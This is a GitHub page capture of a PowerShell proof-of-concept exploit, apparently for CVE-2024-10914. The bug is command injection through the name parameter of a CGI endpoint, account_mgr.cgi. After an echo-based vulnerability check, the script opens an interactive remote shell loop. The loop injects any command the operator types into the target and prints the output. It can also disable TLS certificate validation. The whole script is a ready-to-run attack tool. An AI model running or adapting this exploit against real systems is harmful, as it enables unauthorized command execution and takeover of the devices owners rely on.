-
Notifications
You must be signed in to change notification settings - Fork 12
/
Copy pathcve-2024-10914.ps1
127 lines (105 loc) · 3.96 KB
/
cve-2024-10914.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
#!/usr/bin/env pwsh
# Function to Print Banner
function Print-Banner {
Write-Host @"
_______ ________ ___ ____ ___ ** ** _______ ____ _____ __
/ ____/ | / / ____/ |__ \\ / ** \\** \\/ // / < / ** \\/ ** < / // /
/ / | | / / **/**______/ // / / /_/ / // /_______/ / / / / /_/ / / // /_
/ /___ | |/ / /__/_____/ __// /_/ / **/** **/**___/ / /_/ /\\__, / /__ __/
\\____/ |___/_____/ /____/\\____/____/ /_/ /_/\\____//____/_/ /_/
@VeryLazyTech - Medium
"@
}
# Function to Verify Vulnerability
function Verify-Vulnerability {
param (
[string]$Url
)
Write-Host "[!] Checking if target is vulnerable..."
# Generate a random 5-character string
$verify_string = -join ((65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})
$cmd = "echo $verify_string"
# URL encode the command
$encoded_cmd = [System.Web.HttpUtility]::UrlEncode($cmd)
$endpoint = "/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;$encoded_cmd;%27"
try {
$response = Invoke-WebRequest -Uri ($Url + $endpoint) -Method Get -ErrorAction Stop
if ($response.Content -match [regex]::Escape($verify_string)) {
Write-Host "[+] Vulnerable" -ForegroundColor Green
}
else {
Write-Host "[-] Not vulnerable" -ForegroundColor Red
Write-Host "[-] Exiting..." -ForegroundColor Red
exit 1
}
}
catch {
Write-Host "[-] Error checking vulnerability" -ForegroundColor Red
exit 1
}
}
# Function to Exploit Target
function Exploit-Target {
param (
[string]$Url
)
while ($true) {
$cmd = Read-Host "VeryLazyTech-Shell$"
# Check if the command is "exit"
if ($cmd -eq "exit") {
Write-Host "[!] Exiting exploit mode..." -ForegroundColor Yellow
break
}
# URL encode the command
$encoded_cmd = [System.Web.HttpUtility]::UrlEncode($cmd)
$endpoint = "/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;$encoded_cmd;%27"
try {
$response = Invoke-WebRequest -Uri ($Url + $endpoint) -Method Get -ErrorAction Stop
if ($response.Content) {
Write-Host $response.Content
}
else {
Write-Host "[-] Command not available or returned no output." -ForegroundColor Yellow
Write-Host "[-] For exit enter 'exit'" -ForegroundColor Yellow
}
}
catch {
Write-Host "[-] Error executing command" -ForegroundColor Red
}
}
}
# Main Function
function Main {
param(
[Parameter(Mandatory=$false)][string]$Url,
[Parameter(Mandatory=$false)][switch]$IgnoreCert
)
# Check if URL is provided
if (-not $Url) {
Write-Host "Target URL is required. Use -Url <target_url>." -ForegroundColor Red
Write-Host "Usage: .\script.ps1 -Url <target_url> [-IgnoreCert]" -ForegroundColor Yellow
exit 1
}
# Add TLS support and potentially ignore certificate errors
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
if ($IgnoreCert) {
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
}
# Load required .NET assembly for URL encoding
Add-Type -AssemblyName System.Web
# Print Banner
Print-Banner
# Verify Vulnerability
Verify-Vulnerability -Url $Url
# Prompt for Exploit
$choice = Read-Host "[?] Do you want to proceed with the exploit? [y/n]"
if ($choice -match '^[yY]$') {
Exploit-Target -Url $Url
}
else {
Write-Host "[!] Bye..." -ForegroundColor Yellow
exit 0
}
}
# Parse Arguments and Call Main Function
Main @args